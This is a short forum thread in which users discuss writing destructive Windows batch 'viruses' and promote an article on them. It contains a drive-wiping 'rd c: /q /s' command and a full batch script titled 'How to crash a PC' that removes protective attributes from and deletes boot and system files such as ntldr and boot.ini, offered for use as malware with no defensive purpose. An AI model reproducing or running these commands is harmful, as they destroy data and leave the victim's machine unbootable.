Check out XXxxImmortalxxXX article on batch programming to learn how to make good fundamental batch viruses. The viruses described are very powerful. http://www.go4expert.com/showthread.php?t=11845
Xp locks most disks it has access to from INT 13 commands which you would need to be able to run the format command. a simpler way is to use rd: Code: rd c: /q /s I currently use it to clean temp directories instead of sending things to the recycle bin Code: cd %TEMP% rd . /s/q cd ../"temporary internet files" rd . /s/q fast clean efficient Viruses whether destructive or not are a part of our world. Learning to use them is to our advantage.
I dont know wat dabullet is trying to tell. all he tells is to delete all the files. It can easily done by the command format. any one pls explain. whats his idea???
@topic Creator just making few steps to a virus program. I have also a few batch code for making such type of virus, How to crash a PC Code: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini i don't know who the prgram of topic creator is work :shout: it's b/c without changing attribute of boot file or dll or ini file who could i delete or erase it. would any one explain me :lipsrseal